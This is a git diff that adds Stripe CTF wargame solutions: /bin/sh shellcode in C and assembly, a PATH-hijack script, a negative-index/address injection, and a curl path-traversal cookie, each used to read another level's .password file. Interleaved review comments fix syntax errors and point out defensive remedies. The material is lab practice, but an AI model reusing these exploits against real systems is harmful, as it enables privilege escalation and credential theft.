diff --git a/CTFs_and_WarGames/STRIPE_1-2-3/1/shellcode/Makefile b/CTFs_and_WarGames/STRIPE_1-2-3/1/shellcode/Makefile
new file mode 100644
index 0000000..65d1333
--- /dev/null
+++ b/CTFs_and_WarGames/STRIPE_1-2-3/1/shellcode/Makefile
@@ -0,0 +1,2 @@
+shell: simplest_shellcode.c
+ gcc -static -g -o shell simplest_shellcode.c
diff --git a/CTFs_and_WarGames/STRIPE_1-2-3/1/shellcode/how_to_compile_asm_32.md b/CTFs_and_WarGames/STRIPE_1-2-3/1/shellcode/how_to_compile_asm_32.md
new file mode 100644
index 0000000..dbd5e37
--- /dev/null
+++ b/CTFs_and_WarGames/STRIPE_1-2-3/1/shellcode/how_to_compile_asm_32.md
@@ -0,0 +1,5 @@
+as --32 -o s.o s.s
+ld -m elf_i386 -o s s.o
+./s
+objdump -d s
+
diff --git a/CTFs_and_WarGames/STRIPE_1-2-3/1/shellcode/simplest_shellcode.c b/CTFs_and_WarGames/STRIPE_1-2-3/1/shellcode/simplest_shellcode.c
new file mode 100644
index 0000000..af8d7a0
--- /dev/null
+++ b/CTFs_and_WarGames/STRIPE_1-2-3/1/shellcode/simplest_shellcode.c
@@ -0,0 +1,9 @@
+#include
+int main()
+{
+ char *array[2];
+ array[0] = "/bin/sh";
+ array[1] = NULL;
+ execve(array[0], array, NULL);
+ exit(0);
+}
diff --git a/CTFs_and_WarGames/STRIPE_1-2-3/1/shellcode/simplest_shellcode_32.s b/CTFs_and_WarGames/STRIPE_1-2-3/1/shellcode/simplest_shellcode_32.s
new file mode 100644
index 0000000..8a97918
--- /dev/null
+++ b/CTFs_and_WarGames/STRIPE_1-2-3/1/shellcode/simplest_shellcode_32.s
@@ -0,0 +1,16 @@
+.code32
+.text
+.globl _start
+
+_start:
+ xorl %eax, %eax /* We need to push a null terminated string to the stack */
+ pushl %eax /* So first, push a null */
+ pushl $0x68732f2f /* Push //sh */
+ pushl $0x6e69622f /* push /bin */
+ movl %esp, %ebx /* Store the %esp of /bin/sh into %ebx */
+ pushl %eax /* Since eax is still null, let's use it again */
+ pushl %ebx /* Now we can writ the /bin/sh again for **argv */
+ movl %esp, %ecx /* Write argv into %ecx */
+ xorl %edx, %edx /* NULL out edx */
+ movb $0xb, %al /* Write syscall 11 into %al */
+ int $0x80 /* Interrupt the system */
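Review bot: In simplest_shellcode.c the result of `execve` is never checked, so when the call fails `main` falls through to `exit(0)` and reports success. I would change the tail to `perror("execve"); exit(1);` so a failed exec is visible to the caller. The single `#include` line shows no header name on this page (it may have been lost in rendering); `execve` needs `<unistd.h>`, `exit` needs `<stdlib.h>` and `perror` needs `<stdio.h>`. Adding `-Wall` to the gcc line in the Makefile would flag any missing declaration at build time.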
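Review bot: simplest_shellcode_32.s has no header comment stating its target or register contract, and `movb $0xb, %al` uses a bare syscall number. I would add a block comment above `_start` saying that this is 32-bit Linux using the `int $0x80` convention, with `%eax` holding the syscall number, `%ebx` the path, `%ecx` argv and `%edx` envp, and name the constant with `.equ SYS_EXECVE, 11`. The comment on `int $0x80` would be clearer as `/* execve("/bin//sh", argv, NULL) */`, which also records that the string on the stack has a doubled slash. "writ" in the `pushl %ebx` comment is a typo for "write".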
diff --git a/CTFs_and_WarGames/STRIPE_1-2-3/1/st_ctf1_1.sh b/CTFs_and_WarGames/STRIPE_1-2-3/1/st_ctf1_1.sh
new file mode 100644
index 0000000..1d5ab08
--- /dev/null
+++ b/CTFs_and_WarGames/STRIPE_1-2-3/1/st_ctf1_1.sh
@@ -0,0 +1,6 @@
+!#/bin/sh
+cd /tmp
+echo '/bin/cat /home/level01/.password > date'
+chmod +x date
+export PATH=$PWD
+/levels/level01/level01
\ No newline at end of file
diff --git a/CTFs_and_WarGames/STRIPE_1-2-3/1/st_ctf1_2.sh b/CTFs_and_WarGames/STRIPE_1-2-3/1/st_ctf1_2.sh
new file mode 100644
index 0000000..9450d99
--- /dev/null
+++ b/CTFs_and_WarGames/STRIPE_1-2-3/1/st_ctf1_2.sh
@@ -0,0 +1,2 @@
+!#/bin/sh
+$ /levels/level03 -20 "cat /home/level03/.password $(printf '\xac\x84\x04\x08')
\ No newline at end of file
diff --git a/CTFs_and_WarGames/STRIPE_1-2-3/1/st_ctf1_3.sh b/CTFs_and_WarGames/STRIPE_1-2-3/1/st_ctf1_3.sh
new file mode 100644
index 0000000..5a3f9e1
--- /dev/null
+++ b/CTFs_and_WarGames/STRIPE_1-2-3/1/st_ctf1_3.sh
@@ -0,0 +1,2 @@
+#!/bin/sh
+$ curl --user level01:$(cat /home/level01/.password) --digest -b "user_details=../../home/level02/.password" localhost:8002/level02.php
\ No newline at end of file
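Review bot: The first line of st_ctf1_1.sh is `!#/bin/sh`, which is not a shebang, so the kernel will not recognise an interpreter and the invoking shell will try to run that line as a command. It should read `#!/bin/sh`; st_ctf1_2.sh has the same first line. A header comment would also help readers: the script appears to rely on the level01 binary resolving `date` through the caller's `PATH` (inferred, since the target's source is not on this page). The matching fix on the target side is to call helper programs by absolute path and reset the environment before running them.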
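Review bot: The command line in st_ctf1_2.sh opens a double quote before `cat` that is never closed, and it begins with a copied prompt `$ `, so the file is not valid as a script. The four bytes in `printf '\xac\x84\x04\x08'` are an undocumented constant, presumably specific to one build of the target; a comment such as `# <what this value is and how it was obtained>; build-specific` should record that. For readers on the defending side, a negative index next to an address-like value suggests the target indexes a table without checking the lower bound (inferred; its source is not shown here), which a full `0 <= index < count` check would close.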
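Review bot: `--user level01:$(cat /home/level01/.password)` in st_ctf1_3.sh places the password on curl's command line, where other local users may be able to read it from the process list, and the substitution is unquoted. Quote it as `--user "level01:$(cat /home/level01/.password)"`, or keep the credential out of argv with a curl config file (`-K`). The leading `$ ` is a copied prompt and should not be in a file that starts with `#!/bin/sh`. The `user_details` cookie carries a `../../` path, so the point for defenders is that the server should reject path separators in that value, or canonicalise it and confine it to the intended directory (the PHP source is not shown on this page).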